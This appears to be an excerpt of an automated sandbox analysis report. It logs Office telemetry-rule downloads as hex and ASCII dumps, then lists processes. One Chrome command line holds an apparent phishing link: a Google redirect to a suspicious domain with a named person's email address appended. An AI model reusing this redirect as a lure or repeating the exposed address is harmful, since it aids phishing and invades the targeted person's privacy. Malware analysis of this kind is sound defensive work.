                                                                                        2024-11-01 12:47:03 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        141192.168.2.44990513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:03 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:03 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                        x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124703Z-16ccfc49897hshbrhC1DFW7g1c00000000dg00000000b6xn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        142192.168.2.44990713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:03 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:03 UTC517INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                        x-ms-request-id: 50e7f621-801e-008c-6df0-2b7130000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124703Z-16ccfc49897rxrtbhC1DFWk40s00000000p000000000fyyc
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:03 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        143192.168.2.44990813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:03 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:03 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                        x-ms-request-id: 8a01bb43-d01e-0014-0a08-2ced58000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124703Z-16ccfc49897wlhjjhC1DFWsx6c00000000mg00000000828g
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:03 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        144192.168.2.44990913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:03 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:03 UTC515INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1427
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                        x-ms-request-id: fc004688-501e-00a3-0a24-2cc0f2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124703Z-176bd8f9bc55l2dfhC1DFWw03w00000000g00000000090u5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:03 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        145192.168.2.44991013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:03 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:04 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1390
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                        ETag: "0x8DC582BE3002601"
                                                                                        x-ms-request-id: 62bc2ff2-901e-0016-5408-2cefe9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124704Z-16dc884887bj2dr2hC1DFWk11000000000rg000000003rg4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:04 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        146192.168.2.44991113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:03 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:04 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                        x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124704Z-16ccfc49897774xmhC1DFWuraw00000000e0000000002zky
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:04 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        147192.168.2.44991213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:04 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:04 UTC515INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                        x-ms-request-id: b98889fe-601e-0001-3b0a-2cfaeb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124704Z-176bd8f9bc5fvjnbhC1DFW9ez800000000mg000000005uar
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:04 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        148192.168.2.44991313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:04 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:04 UTC538INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1391
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                        x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124704Z-16ccfc498979lfwnhC1DFW56w800000000tg000000002ch5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:04 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        149192.168.2.44991413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:47:04 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:47:04 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:47:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1354
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                        x-ms-request-id: 8b140993-f01e-005d-3914-2c13ba000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124704Z-176bd8f9bc56k8bfhC1DFWtzvn00000000gg0000000096s8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:47:04 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:08:45:41
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:2
                                                                                        Start time:08:45:44
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1976,i,8441844483652794743,4114512088711831297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:3
                                                                                        Start time:08:45:46
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com"
                                                                                        Imagebase:0x7ff76e190000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
